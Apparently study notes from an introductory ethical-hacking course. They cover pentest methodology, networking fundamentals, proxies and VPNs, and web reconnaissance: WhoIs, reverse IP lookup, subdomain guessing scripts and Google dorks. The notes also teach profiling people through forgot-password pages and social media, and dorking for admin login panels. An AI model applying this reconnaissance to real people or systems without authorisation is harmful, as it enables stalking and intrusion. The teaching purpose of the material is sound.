Web Based Ethical Hacking


Introduction to information security and basics of computer

1. Introduction to information security

As we all know, in the world of hacking, nothing is fully secure.

A hacker tries multiple ways to enter a system and finds possible entry points which would let him enter the system.

Loopholes are small problems which can be exploited to cause bigger problems (or parts of a system which are not properly defined or secured and hence can be exploited to cause unintended behaviour in the system).

And hacking is the art or technique of finding and exploiting security loopholes in a system.

Types of hacking:

Based on the intention of the hacker, hacking can be divided into 2 parts:

  1. Unethical hacking: this is when a hacker uses his knowledge to steal from or cause damage to other people. It is illegal and one can go to jail for it.

  2. Ethical hacking: when a hacker helps organisations or individuals with finding security loopholes and fixing them with their permission, it's referred to as ethical hacking. It's perfectly legal.

The Indian cyber laws and the Indian IT Act classify cyber crimes into 2 broad categories. An activity is considered a cyber crime if:

1. A computer is being used to attack other computers. For example: hacking, virus/worm attacks, DOS attacks, etc.

2. A computer is being used as a weapon to commit real world crimes. For example: cyber terrorism, IPR violations, credit card frauds, EFT frauds, pornography, etc.

This basically means that unlawful use of any computer/device is considered a Cyber Crime.

Types of hackers:

  1. White hat hackers:
  • Good guys

  • Help people with their security.

  2. Black hat hackers:
  • Bad guys

  • Hack and steal information for professional gains.

  3. Grey hats:
  • Part white and part black hats.

  • Practise both ethical and unethical hacking.

2. Hacking Methodologies and Security Auditing

Steps followed by black hat hackers:

  1. Information gathering and reconnaissance: the hacker tries to gather as much info as possible about the target. E.g. server (Apache), backend (PHP 7.0), user base (shoppers, sellers, admins, etc.), architecture (LAMP), etc. He also maps the basic working of various features on the website (this is an extremely important phase as success depends on it).

  2. Vulnerability assessment (VA): the hacker uses automated tools and manual techniques to find possible vulnerabilities in the target.

  3. Penetration testing and gaining access: the hacker exploits the vulnerabilities to gather info, steal data and gain access.

  4. Escalating privileges and maintaining access: after getting access to user accounts, the hacker will try gaining access to the admin accounts and install backdoors, so that even if the passwords are changed and the security gets stronger, the hacker will still have access to the system as long as the backdoors are installed. This is done to maintain access and for further exploitation.

  5. Clearing tracks: the hacker deletes all server log files, removes any additionally added software, deletes all extra users that were created, deletes backdoors and reverts the server to how it was before.

Steps followed by white hat hackers to secure a web application:

  1. Legal documentation: signing a memorandum of understanding (MOU) describing the testing activity and the steps to be taken, on legal paper. A non-disclosure agreement (NDA) states that things like cost, vulnerabilities and details of the server will not be disclosed by either party. A financial agreement is also signed, putting the cost on legal paper.

  2. Scope assessment: deciding what parts of the web application will be tested and the time required to do so.

  3. Info assessment: the client provides some info regarding the system and the security expert then analyses it (info like some accounts, details of the servers, backend language, architecture of the website, etc.).

  4. Vulnerability assessment: just like a black hat hacker, the expert uses automated tools to find all possible vulnerabilities, documents them and then tests them manually.

  5. Penetration testing: try to exploit all possible vulnerabilities & document the results (just like a black hat hacker, but the motive is different). The security expert then documents the exploitability of the vulnerabilities & lists them in a proof of concept (POC), which proves that a vulnerability exists.

  6. Gaining access: now use vulnerabilities to gain access to internal assets, servers and data.

  7. Privilege escalation: try gaining access to the admin account.

  8. Report generation: a descriptive & well formulated report of the entire exercise is prepared (it contains explanations of the impact of the vulnerabilities found).

  9. Patch assistance: the company decides which vulnerabilities are to be fixed/patched (depending on the risk involved & the cost/effort required). The developer patches them & the security expert assists.

  10. Revalidation: we check whether each vulnerability has actually been patched or not.

Security testing / penetration testing (don't confuse this with white and black hat hacking):

White box testing: when the security expert gets complete assistance from the organisation (e.g. information like architecture, source code, demo accounts, server details etc.). Basically, we get complete access to the client's website. The aim is to make sure that no loophole is left.

Black box testing: when the security expert gets no assistance. The expert has as much info as any malicious hacker would have. The goal is to understand how a malicious hacker can harm the website without any assistance from the organisation.

Grey box testing: (mix of white & black) when the security expert gets partial assistance. Here the organisation gives some partial details like demo accounts & server details, but may not give other crucial info like source code, admin access etc. The aim is to see how a hacker who has some basic knowledge can harm the website.

Most organisations prefer grey box testing because:

  • Lesser effort is required to provide information to the security expert.

  • Tells how a hacker with minimal knowledge can harm the website.

Based on the location of the security expert, testing can be:

Internal testing: when the security expert tests the application from the premises of the organisation. Here the servers, applications & other assets of the organisation are present in an internal & private network, so the security expert can directly connect to & access them. This is usually done when the organisation wants to test internal applications & office networks that are part of the internal network.

External testing: when the security expert tests the application from outside the premises of the organisation. Here the servers, applications etc. are connected to the internet & the expert can access them over the internet from anywhere. Most companies prefer this as they are free from travel, accommodation etc.

Computer Network

→ Why learn computer networking? When we try to open a website, different types of computing devices interact with each other to deliver the content of the website. To secure a website, it is important to know how these devices interact with each other.

What is a computer network? Two or more devices connected to each other form a computer network.

Motive of connection can be: File sharing, resource sharing (stuff like printer etc) or communication etc.

→What devices can be connected in a comp. Network?

  1. Common devices like: laptop, phone, printer or any other device that has built-in technology to connect to other devices (Wi-Fi or Bluetooth).

  2. Networking devices like routers, switches & firewalls. They help in making connections smooth & secure.

All devices in a network are called nodes.

Types of computer networks

On the basis of geographical coverage:

LAN: Local area network

MAN: Metropolitan area network

WAN: Wide area network

On the basis of accessibility:

→ Internal network: e.g. devices connected to one router, like in one home: phone, tablet & printer. These devices form a network that can only be accessed from inside, and it is guarded by the router.

→ External network: e.g. connecting to Google using the internet, which is an external network and can be accessed by anybody. So when resources/devices need to be accessed publicly, they are configured on an external network. E.g. chatting over Facebook using the internet.

An internal network helps keep data & resources isolated from public access.

Client server models & data packets

A website is made up of data like text, images, videos etc.

For us to be able to see this data, it needs to be stored on a device which is connected to the internet at all times. These devices are called servers. The data is stored on the server assigned to that particular website & the server sends the data when asked for.

Client server model (used in web Dev. industry a lot.)

When we open a website, an image sometimes loads slowly (in parts). This happens because, when we request some data (e.g. an image), the server breaks the data down into small chunks called data packets and then sends them across. This is done to make communication more efficient.

  • All data travels in small chunks called data packets.

What is an IP address?

How does our device find the server of the website?

  • all devices in a network interact using IP addresses.

→ each and every device connected to the internet has an IP address. (e.g. laptop, phone, servers etc)

→ when we search google.com, the IP address of google.com server automatically gets dialled. This makes our lives easier.

→ our device gets an IP address every time it connects to the internet. But once we disconnect & connect back again, either our IP address stays reserved (static IP address) or it gets freed up & we are assigned a different IP address (dynamic IP address).

IP address versions:

IPv4 - IP version 4 address. E.g.: 198.162.1.1. Pattern followed: A.B.C.D.

A, B, C, D can each be an integer between 0 and 255.

  • only about 4.2 billion (2^32) IPv4 addresses are possible.

To tackle this problem, IPv6 was created.

IPv6- IP version 6. pattern followed → A:B:C:D:E:F:G:H

Each of A, B, …, H is a group of 4 hexadecimal digits, i.e. 0-9 and a-f (or A-F).

Since IPv6 is a newer technology, old devices still use IPv4 (they are not compatible with IPv6).

Another solution to the limited number of IPv4 addresses:

NAT (Network address translation)

Internal IP address:

So, computer 4 can't connect directly with computer 4' because it will not know the internal IP address of computer 4'. Only a router knows the internal IPs of the devices connected to it. So computer 4 will have to go to router 1 first, which will connect to router 2, and that will forward the traffic to computer 4'. So, we can say the 4.2 billion IPv4 addresses can be reserved for external IP addresses, since only those are visible to the public, & internal IPs can be repeated across networks.

IP Address Range: Now that we know about IP addresses, we must know that some IP address ranges are reserved for special usages. Here is a list:

For small internal networks (like your home or a small office): 192.168.0.0 to 192.168.255.255

For large internal networks (Like large MNCs, colleges, schools): 172.16.0.0 to 172.31.255.255

For massive internal networks (Like telecom networks, satellites): 10.0.0.0 to 10.255.255.255

127.0.0.1: This is called the LoopBack address and is used as the address of your own machine.
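To see these reserved ranges in practice, here is a minimal sketch using Python's standard ipaddress module (the addresses chosen are just examples); it simply reports which of them fall in the private and loopback ranges listed above.

import ipaddress

# Example addresses: three from the reserved internal ranges above,
# the loopback address, and one public address (Google's DNS).
for ip in ["192.168.1.10", "172.20.5.4", "10.0.0.7", "127.0.0.1", "8.8.8.8"]:
    addr = ipaddress.ip_address(ip)
    print(ip, "-> private:", addr.is_private, "| loopback:", addr.is_loopback)

# The first three report private, 127.0.0.1 reports loopback (and private),
# and 8.8.8.8 reports neither, i.e. it is a public address.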

What is a Domain Name?

A domain name is a humanly understandable name of any web application hosted on one or more servers, & it helps us connect to them.

We use these names because they are easy to remember; the devices themselves use IP addresses to connect to other devices.

When we type domain names in the address bar, the system correspondingly converts them into IP addresses. It can do so in 2 ways:

  1. system can maintain a list of frequently visited web sites & their IP addresses.

This cannot be done for all the websites because it will take up too much memory and IP addresses are mostly dynamic (keep changing) and hence a list cannot be maintained.

  2. When we type the domain name of any website, the system calls the Domain Name System or DNS to help us locate the IP address of that domain name.

What is DNS?

A DNS or Domain name system is a system of devices that helps us find the corresponding IP address of a domain name. The DNS consists of many servers which do the job of finding IP addresses for the domain names.

Why is the DNS made up of a series of servers & not just one single server?

  1. One server alone cannot store such massive information about so many domains.

  2. One server alone cannot handle millions of incoming requests per second.

Working of a domain name system

eg: drive.google.com.

In this example, each of these parts has a separate name for it. Information of each part is stored in a different server or component of the DNS.

  • A domain name is always read backwards.

last dot (.) → root name → stored in root name server

That part of the domain name is not written by us but gets added.

.com → Top level domain (TLD) → TLD server

  • Sometimes there may be a second level domain. Eg: .co.in

.co → second level domain → SLD server

google → authoritative name → authoritative name server

This is the name we actually buy from a domain name provider.

drive → subdomain/ host.

→ host because it is the actual page being requested by us.

→ sub domain because it is part of the authoritative name.

→ client only buys the authoritative name of the domain. Sub domains can be created by the owner for free.

→ Since it is part of the authoritative name, the authoritative name server only stores info about its subdomains.

  • Cache memory: temporary memory that all devices have so they can store information temporarily. Our browsers, operating systems & all the servers in the DNS store some domain names and their IP addresses in cache. These are the most frequently requested addresses.

  • Cache memory makes the process faster.
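As a quick illustration of what the DNS does for us, here is a minimal sketch (assuming network access) that asks the system resolver for the IP address behind a domain name, the same lookup the browser performs before connecting:

import socket

domain = "drive.google.com"        # subdomain "drive" under the authoritative name "google"
ip = socket.gethostbyname(domain)  # asks the system resolver, which may answer from cache
                                   # or query the DNS hierarchy (root -> TLD -> authoritative)
print(domain, "resolves to", ip)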

Ports

When we are using multiple websites at the same time, our device is connected to different servers & receiving data from them. Now, to avoid confusion about which data is from which server (or, from the server's point of view, which request is from which device), all devices have ports (both clients & servers).

Hardware ports: USB port, audio port, HDMI etc. These are gateways to get inside the system and interact with the hardware.

Software ports: provide a gateway to get inside the system & interact with the software.

Reserved ports:

Port 80 → HTTP service

Port 443 → HTTPS service

Port 21 → FTP service

Port 23 → Telnet service

Port 25 → SMTP service

  • When a data packet is travelling from device to server (or vice versa), this packet contains 4 pieces of information:

IP address & port no. of server (to deliver) and

IP address & port no. of the client (to send response)

E.g. 198.234.20.1:80. Such a combination of IP address and port number is called a virtual socket. (E.g. friends who connect to play Counter-Strike all connect to the game's port on the server.)

  • Many services can run on a server.

A service listens on a port of the server, captures requests from clients & responds to them. Each service runs on a different port.

Reserved port range:

Ports 0-1023: reserved for basic, well known services.

Port 1024-49151: reserved for some registered services. (eg counter strike)

Port 49152-65535: range of temporary ports. (used by clients)

  • Port on the sending device is called local port & port on the receiving device is called remote port. These are relative terms.
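Here is a minimal sketch (assuming outbound internet access) that opens a TCP connection to a web server and prints both ends of the virtual socket: the temporary local port picked on our side and the reserved remote port 80 on the server side. The target host is just an example.

import socket

with socket.create_connection(("example.com", 80)) as s:
    local_ip, local_port = s.getsockname()    # our IP and a temporary (ephemeral) local port
    remote_ip, remote_port = s.getpeername()  # the server's IP and the reserved HTTP port 80
    print("local  socket:", f"{local_ip}:{local_port}")
    print("remote socket:", f"{remote_ip}:{remote_port}")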

To check open ports:

To check for open ports on a windows machine:

1. Go to the start menu and type cmd.

2. Right click on the command prompt and click on the ‘run as administrator’ option.

3. Type: netstat -a | find /i "listening"

You will see a list of all ports that are listening for a request.

To check for open ports on a Mac OS:

1. Open the terminal and run the following command.

2. netstat -an | grep LISTEN

To check for open ports on a Linux machine:

1. Open the terminal and run the following command.

2. netstat -lpnt

Question: Run the netstat command and see what ports are running on your system. Use Google and find out what these ports are used for and then deduce why your system is waiting for a connection on each of these ports.

Tip: On Windows, Run cmd as administrator and inside it, “netstat -aon”.

Here is a sample output:

As you can see we have 5 columns.

Proto: This is the base protocol being used (TCP/UDP)

Local address: This is the IP address and Port number (separated by a colon) of your computer being used to communicate.

Now you can see that in the screenshot, we have various IP addresses: 0.0.0.0 , 10.0.75.1 , 127.0.0.1

This IP address tells you which network this entry is for. For example, if you are connected via LAN cable and get the IP 192.168.12.123, then all communications via the LAN cable will have this IP. Parallelly, if you also have WiFi connected with the IP address 10.0.0.145 then for WiFi connections, this IP will be shown.

Also, 0.0.0.0 simply means all interfaces, be it Local, LAN, WiFi etc. And 127.0.0.1 means communication is happening locally within your own computer between different applications.

Foreign Address: This is the address of the device your system is communicating with. So let’s say you visit Google.com on port 443 and Google’s IP address is 1.2.3.4 then in the foreign address, you will see 1.2.3.4:443 and in the local address, you will see the IP address of the network interface being used to connect to Google (Like your LAN IP or your WiFi IP etc)

State: This is a very important column as it tells you the state of the connection. In the above screenshot, you can see ‘Listening’, which means your system is waiting for a connection on the given port. Similarly, ‘Established’ means a connection has already been made and communication is probably happening.

PID: This is the process ID of the software handling the communication. You can use the ‘tasklist’ command to see all running programs and their respective process ID.

Now let us break down the 1st entry in the output

Proto: TCP

Local Address: 0.0.0.0:135

Foreign Address: 0.0.0.0:0

State: LISTENING

PID: 1080

Here the Protocol is TCP. As the state is listening, and the local address is 0.0.0.0:135 it means that our computer is waiting for connections on port 135 and 0.0.0.0 means from anywhere, so anyone in your network whether WiFi, LAN or from your own computer, can connect to your IP on port 135.

In listening, the foreign address doesn't matter too much.

The PID here is 1080.

Below is the output of the tasklist command, showing what exactly PID 1080 is.

So this means that svchost.exe is listening on port 135 for incoming connections from anywhere (0.0.0.0)

Now your task was to find open ports on your computer which are waiting for connections, i.e. whose state is Listening.

From the 1st screenshot, we can see that our system is listening for connections on the following ports:

135, 445, 903, 913, 1536, 1537 and many more (you might have more or less ports)

You can search about these ports on Google to see what they are used for and why your system is waiting for the connection.

For example, the port 135 is used by an internal Windows Service responsible for your system to communicate with other Windows machines in the network for file sharing, authentication, etc.

The same is true for port 445.
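If you want to double-check a port from the netstat output, here is a minimal sketch that probes a few local ports and reports whether something is listening on them (the port numbers are just examples; replace them with the ones from your own output):

import socket

for port in (135, 445, 3306, 8080):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.5)
        result = s.connect_ex(("127.0.0.1", port))  # 0 means the connection succeeded
        print(f"port {port}:", "open (something is listening)" if result == 0 else "closed")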

Protocols:

Looking at Common Protocols: Nodes follow different protocols for different functions. Here is a list of some common protocols.

HTTP: HTTP stands for HyperText Transfer Protocol and it is used to transfer hypertext, which means web pages.

HTTPS: This is the secure version of HTTP, where s stands for secured and is used to transfer web pages in a secured way. Most websites that we visit, like internshala, amazon, google, etc., use HTTPS and not HTTP. The fact that it is secured means that all communications between your browser and the website you are connected to, will be encrypted. You can see this in the address bar located at the top of the browser.

FTP: FTP stands for File Transfer Protocol and is used while transferring files.

SMTP: SMTP stands for Simple Mail Transfer Protocol and as the name suggests, it is used to send emails from one device to another. But when you open gmail, or compose and send an email, does your address bar show SMTP, or HTTPS. Well, try it and find out for yourself, and look out for the reason somewhere in this topic.

Telnet: This protocol is used to remotely run system commands on the server.

SSH: SSH is Secure Shell and is like a secure or encrypted version of Telnet.

VOIP: This stands for Voice Over Internet Protocol and is used for making a voice call over the internet. So while you are making calls over whatsapp or skype, VOIP is being used for this communication.

What are protocols?

A set of rules & regulations that devices follow to transfer & receive data over a wired or wireless medium.

Understanding TCP/IP model

Transferring data from one node to another involves multiple steps:

All this work is done in a particular order & there are different layers to take care of each task.

These layers make up the TCP/IP model.

→ This model has 4 layers & there are different protocols & rules for carrying out work in each layer. All layers deal with different aspects of data transfer.

4. Application layer: converts data into binary.

→ It encodes, compresses & encrypts data.

→ Also establishes sessions. (initiates sessions)

What are sessions?

↳ A session involves signalling to set up & manage communication between 2 devices.

→ Used to establish a comm b/w 2 devices.

→ info. signals sent from node A to node B. (like hello, bye etc).

→ It lets node B know that node A wants to communicate with it. Once node B confirms that it is ready to communicate, the actual communication starts. Similarly, a termination signal is sent & the other device acknowledges. (Termination of the session)

  • Our browser acts as the application layer. Protocols: HTTP, FTP, Telnet etc.

3. Transport layer

→ port no.s are added to the data packet.

Thus, an application to application connectivity is formed.

protocols: TCP, UDP

2. Network Layer

→ adds the sender's & receiver's addresses to the data packet.

→IP address provides the logical path that needs to be taken by a data packet to reach the destination device.

→This layer handles IP addressing, routing & virtual pathing.

→It adds MAC addresses of the client & the server.

Protocols: DHCP (for assigning IP addresses), ARP(for conversion b/w IP and MAC addresses), & ICMP (for debugging network stability & deliverability).

1. Physical layer:

→ converts binary signals into electrical signals for data transfer, so they can be transported through physical cables and optic fibres.

→ comprises hardware used for data transfer.

→ checks for errors & controls the flow of data. E.g. Wi-Fi adapter.

protocols: Ethernet (for LAN cables), 802.11 (for wireless connections like Wi-Fi), DSL (for telephone cables).

  • When a packet is received, the same process is followed in reverse order.

  • UDP, TCP, FTP, SSH, HTTPS, TELNET, DHCP, IP }- all these are part of a stack of protocols, called TCP/IP stack.

  • 2 main layers in this model→ Transport layer & network layer.

Protocols on these layers, give name to this model.

Understanding TCP/UDP protocols (Transport layer):

These protocols deal with 2 diff ways in which data packets are transferred.

TCP→ transmission control protocol.

UDP→ User datagram protocol.

In TCP, the sender waits for an acknowledgement and retransmits the packet if no confirmation arrives for some time.

TCP: connection oriented — the 2 devices first establish a connection & then send the data packets via this connection.

UDP: not connection oriented — the 2 devices do not establish a connection and start sending data packets directly.
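The difference is easy to see at the socket level. Below is a minimal sketch: the UDP datagram is simply fired at an address with no handshake, while the TCP socket must complete a connection first. The addresses and ports are placeholders; the TCP part assumes something is listening on 127.0.0.1:80.

import socket

# UDP: no connection is established, the packet is just sent (delivery is not confirmed).
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.sendto(b"hello over UDP", ("127.0.0.1", 9999))
udp.close()

# TCP: connect() performs the handshake first, then data is sent over that connection.
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.settimeout(2)
try:
    tcp.connect(("127.0.0.1", 80))
    tcp.sendall(b"hello over TCP")
    print("TCP: connection established and data sent")
except OSError as e:
    print("TCP: connection failed (nothing listening on that port?):", e)
finally:
    tcp.close()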

Understanding DHCP/IP protocols (Network Layer)

DHCP

→ Dynamic host configuration Protocol.

→responsible for allocating IP addresses to devices.

IP

→Internet protocol.

→Responsible for routing of packets.

OSI Model

So, we have seen the TCP/IP model. It is actually a derived model and is the one used today. The original model on which the TCP/IP model was based is called the OSI model. This model has 7 layers, instead of the 4 that we see in the TCP/IP model. The essential overall function of both models remains the same; in the OSI model the work has just been split into 7 layers.

Now let us look at the function of each layer of the OSI model in detail.

So, just like in the TCP/IP model, the data in the OSI model also passes from layer 7 to layer 1 at the sender’s end and from layer 1 to layer 7 at the receiver’s end.

Application Layer- This layer provides an interactive interface for the user to enter and view data. One can give inputs in the form of text, audio, images, files, etc. The browser makes up the application layer.

Presentation Layer- After the application layer, the data passes to the presentation layer. This is where the data is converted into computer friendly format, i.e in binary code. So, the presentation layer encodes the input, compresses it, and encrypts it if required. Then the data is sent to the next layer.

Session Layer- This layer initiates a connection and creates a session, so that some context can be provided to the communication between the two devices.

Transport Layer- This layer establishes an application level connectivity. For this, it attaches the source and destination port numbers.

It also performs the task of error control, which means that it makes a checklist, so that it can be cross checked at the receiving end to ensure that all the data is transferred properly and not destroyed on the way. These checklists are known as checksums.

Network Layer- At the network layer, the source and destination IP addresses are attached, for the purpose of identification of devices, and to decide the virtual path that needs to be taken by the data packet. So, we can say that this layer does network level routing and pathing of packets.

Data Link Layer- This layer attaches the source and destination MAC addresses, which are used to identify the hardware of the device. It also calculates checksums for error checking of the metadata that has been attached at all the previous layers, and also to manage the flow of data.

Physical Layer- This is where the data is converted to hardware friendly signals, like radio signals, light signals, or electric signals, depending on the hardware that is being used for data transfer.

This is the order in which the data passes at the sender’s end. At the receiver’s end, the order of the layers is reversed.

Now, don’t worry if you cannot remember all this information. We have some simple tricks for you. A simple mnemonic that can be used to remember the order of the layers from layer 7 to layer 1 is:

All People Seem To Need Data Processing

So that was all about the OSI model.

Proxy

Proxy server provides anonymity to both sender & receiver.

Proxy hides IP addresses of both server & client. Our browser history won’t show which device we connected to and it will only show connecting to proxy. The websites won’t be able to see our IP address either. It will only see the IP of the proxy.

Disadvantages of proxy:

proxy servers can keep a record of the logs, & conversations between our device & the websites we are visiting.

Uses of proxy servers:

→ To hide IP addresses.

→ By network administration to ban certain websites.

Colleges can monitor all the traffic on their Wi-Fi and hence choose to drop all requests to certain websites.

→ By developers for troubleshooting.

When a new app/website is being developed, its requests & responses are recorded by the proxy, and this helps in troubleshooting.

→Reducing traffic on the server.

A proxy server saves frequently visited websites in its cache memory, hence saving time.

Uses of proxy servers:

General users:

1. Obscure their IP

2. Avoid surveillance

3. Bypass browsing restrictions

4. Access resources as from a different country

Developers:

1. Monitoring web traffic

2. Troubleshooting web applications

Network administrators:

1. To block malicious traffic

2. To balance overflowing traffic

Using proxy to change IP address:

3 ways in which proxy can be used:

  1. Sending traffic of one tab in the browser through proxy:

First, find a proxy (free or low cost). Proxies that are used to divert the traffic of a single tab, or for sending all browser traffic through a proxy, are called online or web proxies.

Advantages:

→ No setup required / easy to use.

→ no browser history.

→ options to change countries on the fly.

Disadvantages:

→ lots of advertisements (for free ones).

→ Untrusted & can be unsafe.

→They keep complete logs.

→Slow speed.

→ Not suitable for all web activity.

→ Proxy has to be implemented on each tab (for tab base proxy).

  • To implement: search ‘free web proxies’ on google.
  2. Sending all browser traffic through a proxy:

Advantages:

→ no need to set up a proxy on every tab.

→ can pick servers by anonymity.

Disadvantages:

→ slightly hard to set up.

→ IPs need to be changed frequently as a lot of them stop working.

→ slow speed.

→ No guarantee of anonymity.

→ Only works with standard browsers on the PC.

  • To implement: search ‘public proxy server list’ on google.
  3. Browser plugin based proxies:

These are available in free / paid versions & can be downloaded in the browser & used. They provide the option of switching from 1 IP address to another for better anonymity, eg: Foxy proxy and anonymox.
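Outside the browser, the same idea can be scripted. Here is a minimal sketch (assuming the third-party requests library is installed); the proxy address is a placeholder that you would replace with a proxy from one of the lists mentioned above. The site httpbin.org/ip simply echoes back the IP address it sees, so it shows whether the proxy's IP, and not ours, reaches the website.

import requests

proxies = {
    "http":  "http://203.0.113.10:8080",   # placeholder proxy IP:port, substitute a real one
    "https": "http://203.0.113.10:8080",
}

# The response should contain the proxy's IP address, not our own.
resp = requests.get("https://httpbin.org/ip", proxies=proxies, timeout=10)
print(resp.text)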

Disadvantages of proxies:

→ No guarantee of security & anonymity.

→ Proxies keep log of all requests.

→ No encryption is provided in a lot of cases.

→ can only be used for web browsers on PC.

→ slow speed.

  • VPN: Virtual Private Network.

How are VPNs better than proxies?

→ Fast

→ Secure & encrypt all data.

→Do not save logs.

→ Guarantee anonymity.

→ can be set up for all applications on various devices, like laptop, mobile etc.

working of a VPN:

Creates a virtual tunnel between client & server, and all conversation is encrypted.

Therefore, While using VPN, we are part of a private & secure network.

Advantages of using a VPN:

→ Mostly used by large scale businesses to allow faraway employees to access the internal network in a secure way.

→ To hide one's IP address from hackers, snoopers, govt., ISPs etc.

→ To bypass browsing restrictions placed by colleges, schools, offices etc.

→ To avoid a region wide block of some IP addresses.


Information Gathering and Reconnaissance

The 1st step white hat hackers perform after the legal paperwork is information gathering & reconnaissance.

What is information gathering?

Gathering as much info about the target as possible & organising it in a structured manner so that it can be utilised later in the vulnerability assessment & penetration testing phase.

What is Reconnaissance?

It is the process of analysing all this info gathered & utilising it to understand the target.

Who is the target?

target will be the web application that needs to be tested.

Depending on whether it is black/grey/white box testing, the information provided by the organisation will vary.

What kind of information?

The info that we gather are called the digital footprints.

Digital footprints are the traces left online while a person is using the Internet. These traces can be used to trace a person, organisation or web application.

E.g. an IP address left at some point, likes on Instagram, chats on Facebook, or preferences & ads in online shopping.

Information gathering:

Some common pieces of info expert tries to gather:

  1. Critical assets or web applications that belong to the client.

  2. Related domains & sub domains.

  3. Server architecture of the applications running on these domains.

  4. Registration details of each domain.

  5. Other web applications running on the same server as the target domains.

  6. critical cached pages.

  7. older snapshots of the web application.

In this, 1 and 4 are directly related to target

And 2 and 3 are related to the registration details of the domain where the target application was hosted.

Registration details include: name of the owner, name of the developer, Date of Hosting, date of Expiry.

Why do we need this info? It will not help us find vulnerabilities directly, but it comes under the area of social hacking. Here's how it's relevant.

Let's say Google hires an expert to conduct black box testing. He is given no info, not even the application he needs to test.

He starts by finding: CEO's name, his Fb & details, organisation's address, domain registration details, Developer's name etc. (Say Mr.X.)

The expert will now find out more about Mr. X, like his history, where he has worked in the past, how active he is on social media, etc. The aim is that if he compromises Mr. X, he can get complete access to google.com without having to find bugs.

Once the expert gets backend access, he can test easily. But why do we get to do such seemingly unethical things? Because they are not unethical here: we are hired to do all this.

Why conduct a black box exercise?

→ To get a black hat hacker’s perspective without internal assistance.

→ To test the preparedness of the organisation's internal security team.

Most common types of info services that aid in information gathering:

  1. WhoIs information:

WhoIs is a protocol that queries & receives responses from the database that stores the registration information of a domain or an IP address.

  • provides info about ‘who is' behind the domain for eg, stuff like:

→ Name of organisation

→ owner of domain

→ Developer (who handles domain) etc

And about them, stuff like full name, complete contact address, e-mail address and fax number. All this info is public, & this is the information we get from a WhoIs lookup. This info is the starting point for finding other information.
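Under the hood, WhoIs is a very simple protocol: a plain TCP query sent to port 43 of a WhoIs server. Here is a minimal sketch; whois.verisign-grs.com is the registry WhoIs server for .com domains (other TLDs use other servers, and whois.iana.org can point you to the right one), and the domain queried is just an example.

import socket

def whois_query(domain, server="whois.verisign-grs.com"):
    # Connect to the WhoIs server on port 43, send the domain, read the reply.
    with socket.create_connection((server, 43), timeout=10) as s:
        s.sendall(domain.encode() + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

print(whois_query("internshala.com"))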

  2. Reverse IP lookup:

Sometimes multiple websites are hosted on one server. They may or may not be from the same organisation. When they are from different organisations, it is called shared hosting.

What is reverse IP Lookup? It looks up the IP address & gives a list of all the domains running on the same server.

  • Gives list of domains that have the same IP address.

Let's say that websites A & B are on the same server (we got to know this from a reverse IP lookup). A is the target application, but it is very difficult to find bugs in it. However, B has bugs that are easy to exploit. Through these bugs we can get hold of the server & hence of website A.

Gathering information about people & organisations (WhoIs lookup):

Here is how we find this info:

  1. Full name: social media (Facebook, Instagram etc.) and professional platforms (LinkedIn, naukri.com etc.)

  2. E-mails:

→ forgot password on email ( directly on gmail etc)

→ forgot password on services linked to an email (try logging on amazon, ola, facebook etc using that email.)

→ google search: write the email address in double quotes and search on Google. The results will show everywhere that email has been used publicly, e.g. a job posting or a public query.

  3. Mobile no.:

→ login & forgot password pages (just like email.)

→ google search (write the mobile no. in double quotes)

Finding information about organisations:

  1. Social media platform: activities of company, ex employees etc.

  2. company review services: working environment, fee structure etc.

  3. Organisation financial Analysis services:

→crunchbase, wikipedia, angel list etc.

→information about the financial situation of the organisation & key people associated.

Here are some key pieces of information that a security expert usually gathers about a website:

1. Related domains and subdomains

2. Technology and programming languages being used

3. Cached pages

4. Website history

5. Publically indexed files on search engines

6. Default pages and login forms

7. Related IP addresses

8. Other services running on those IP addresses

9. Version of the services/softwares being used

10. Publicly disclosed vulnerabilities in the softwares being used

11. Default users

12. Default passwords

13. Valid email address and usernames

Gathering information about websites & Web servers:

  1. Getting an idea about the technology being used by a website & web server.

ways of finding this out:

→ Look at the HTTP requests & responses of a website.

→ Look at the HTML code, that is the page source of a website.

→ use websites like builtwith.com to see the framework (coding language), the web hosting provider (where it is hosted) & the web server (server software being used).

builtwith.com also has a browser extension, so this can be seen while we’re browsing.

  2. Looking at the history of a website (web archives).

We are trying to see how the website looked, a few years ago & how it has changed over time. What information has been added/deleted etc.

→ Use websites like web.archive.org (it scans & takes snapshots of websites from time to time; you can go to the year you want to see).

  3. Finding related subdomains of a given domain (e.g. drive for google)

It is possible there are assets placed in sub domains & these assets are weakly configured & hence can be exploited.

How to find a subdomain?

→ make a guess (a small scripted version of this approach is sketched after this list)

→ Go through the server DNS files.

→ google search, or use websites like dnsdumpster.com (see the host records (A) section to see all the subdomains that a website has).
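Here is the small scripted version of the guessing approach mentioned above: a minimal sketch that tries a tiny, purely illustrative wordlist of common subdomain names and keeps the ones that actually resolve (assumes network access).

import socket

domain = "google.com"
guesses = ["www", "mail", "drive", "docs", "dev", "test", "admin"]

for sub in guesses:
    host = f"{sub}.{domain}"
    try:
        ip = socket.gethostbyname(host)   # if the name resolves, the subdomain exists
        print(f"{host} -> {ip}")
    except socket.gaierror:
        pass  # the name does not resolve, so this guess (probably) does not exist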

  • ‘Crunchbase’ website → useful for looking at the financial & funding records of an organisation

  • ‘Glassdoor’ → is for company reviews.

Understanding search engines & Dorks

The search engine goes to the 1st web page of every website & then visits the other web pages linked to that page. While doing this, it collects all the data that it finds, and the process continues for the entire website. This process is known as crawling. It's an ongoing process, since websites keep updating their data & adding new web pages, & it is done for all the webpages on the internet.

  • The search engine adds all this information in a special database called the search index & retrieves the info from there.

Dorks: special keywords we can use to do a more accurate search on Google. E.g. site:internshala.com.

Dorks are special search filters that can be applied to a search engine, to make the search targeted and specific.

Some of the most commonly used google dorks are:

  1. site: <Domain> This is the most common dork, and it filters out web pages from a single website. E.g. “site:internshala.com” lists out all the web pages on Internshala. It can also be used to search for web pages within a specific subdomain, or even for an entire TLD. So you can search for “site:training.internshala.com” to search within a specific subdomain, or for “site:in” to search for all the web pages under the top level domain (TLD) “.in”.

  2. inurl: <Text to find> This keyword can be used to find URLs with specific text in them. So if you search for “inurl: login.html” it will give a list of all URLs where the text login.html is present.

  3. intitle: <Title text> This dork can be used to search for web pages which have some specific keyword in the web page title. For example, “intitle: admin login” gives a list of several admin panels.

